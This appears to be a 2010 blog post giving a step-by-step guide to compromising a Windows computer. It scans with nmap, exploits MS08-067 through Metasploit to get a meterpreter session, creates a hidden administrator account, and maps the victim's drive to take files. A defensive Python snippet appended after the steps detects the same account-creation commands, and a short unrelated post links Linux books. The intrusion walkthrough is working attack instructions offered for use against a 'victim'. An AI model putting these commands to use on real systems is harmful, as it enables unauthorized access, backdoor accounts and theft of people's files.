Monday, April 26, 2010
hack the target system
Main Part:
- We download nmap (nmap.org) so that we can scan the remote pc.
- On the terminal we write: nmap -sS -O
- If you see that ports 139 TCP and 445 TCP are open then everything is exactly as we want it to be.
- Now we download Metasploit (metasploit.org) and we open it via the Terminal.
- Now that Metasploit is running we start the attack.
- We write at the terminal “show exploits” and we get a list of the available exploits.
- We choose the exploit “ms08_067_netapi” by writing “use windows/smb/ms08_067_netapi”
- Now we set RHOST to our victim’s IP: “set RHOST”
- And RPORT to 445: “set RPORT 445”
- Now we write “set SMBPIPE SRVSVC” and hit ENTER and then “set TARGET 0” and hit ENTER again.
- OK! Let’s set the Payload: “set PAYLOAD windows/meterpreter/bind_tcp”
- IT’S TIME TO HACK THE COMPUTER!!!! Write “exploit” and hit ENTER.
- If everything is ok you should see the following message: “[*] Meterpreter session 1 opened (xxx.xxx.xxx.xxx:xxxx -> xxx.xxx.xxx.xxx:xxxx)”
- Meterpreter is running. We are inside the target pc!
- Let’s open the target’s CMD: “execute -f cmd.exe -c -H -i”
- If it says “X:\WINDOWS\System32” then the mission is accomplished.
- Now let’s create our own admin account.
- Write: “net user n0f4t3 mypass /add”. You should see a confirmation message saying “The command completed successfully.”
- Now let’s make the account an admin: “net localgroup administrators n0f4t3 /add”.
- You should see again the confirmation message saying: “The command completed successfully.”
- Then type “exit” to exit CMD.
- OMG!! We made it!!! But how can we steal his files????
- We boot from Windows……….
- We go to “Start>Run”, we type “cmd” and we hit ENTER.
- Then we write “net use X: \\\C mypass /user:n0f4t3” and hit ENTER.
- If that doesn’t work type “net use X: \\\C: mypass /user:n0f4t3” and hit ENTER
- Now go to “My Computer” and you should see a new Drive called X:. Open it and enjoy the victim’s files.
That’s all Folks!!!
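Seen from the defending side, the two `net` commands in the steps above are the clearest trace this sequence leaves on the host. The following is an added example, not part of the original post: it correlates process command lines to flag a local account that is created and then added to the Administrators group on the same host within a short window. The record layout, host names and the 10-minute window are assumptions, and the sample events are constructed.

```python
import re
from datetime import datetime, timedelta

# Constructed sample records (host, timestamp, command line); the layout is an
# assumption standing in for whatever process-creation log you collect.
SAMPLE_EVENTS = [
    ("WS-017", "2010-04-26T10:02:11", "net user n0f4t3 mypass /add"),
    ("WS-017", "2010-04-26T10:02:40", "net localgroup administrators n0f4t3 /add"),
    ("WS-022", "2010-04-26T11:15:00", "net user tempuser Passw0rd /add"),
    ("WS-022", "2010-04-26T15:45:00", "net localgroup administrators tempuser /add"),
    ("WS-030", "2010-04-26T12:00:00", "NET1.EXE  localgroup Administrators helpdesk /ADD"),
    ("WS-031", "2010-04-26T12:05:00", "net user"),  # listing accounts, not adding one
]

# net / net1, with or without ".exe", quotes or a full path in front.
_NET = r'^\s*"?(?:[a-z]:\\[^"]*\\)?net1?(?:\.exe)?"?\s+'
USER_ADD = re.compile(_NET + r'user\s+(\S+)\s+.*?/add\b', re.I)
ADMIN_ADD = re.compile(_NET + r'localgroup\s+"?administrators"?\s+(\S+)\s+/add\b', re.I)


def correlate(events, window=timedelta(minutes=10)):
    """Return (host, account, seconds_between) for every account that is
    created and then added to Administrators on the same host within `window`."""
    created = {}  # (host, account) -> time the account was created
    hits = []
    for host, ts, cmd in sorted(events, key=lambda e: e[1]):
        when = datetime.fromisoformat(ts)
        m = USER_ADD.match(cmd)
        if m:
            created[(host, m.group(1).lower())] = when
            continue
        m = ADMIN_ADD.match(cmd)
        if m:
            key = (host, m.group(1).lower())
            born = created.get(key)
            # Only flag the pair: a group change with no recent creation
            # (WS-030) or a slow one (WS-022) is left for other rules.
            if born is not None and when - born <= window:
                hits.append((host, key[1], int((when - born).total_seconds())))
    return hits


if __name__ == "__main__":
    for host, account, gap in correlate(SAMPLE_EVENTS):
        print(f"ALERT {host}: '{account}' created and made admin within {gap}s")
```

On current Windows versions with account-management auditing enabled, the same pair also appears in the Security log as event 4720 (user account created) followed by 4732 (member added to a local group).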
Saturday, April 3, 2010
english/linux books
http://career-assessments.blogspot.com/2008/01/red-hat-linux-certification-program_26.html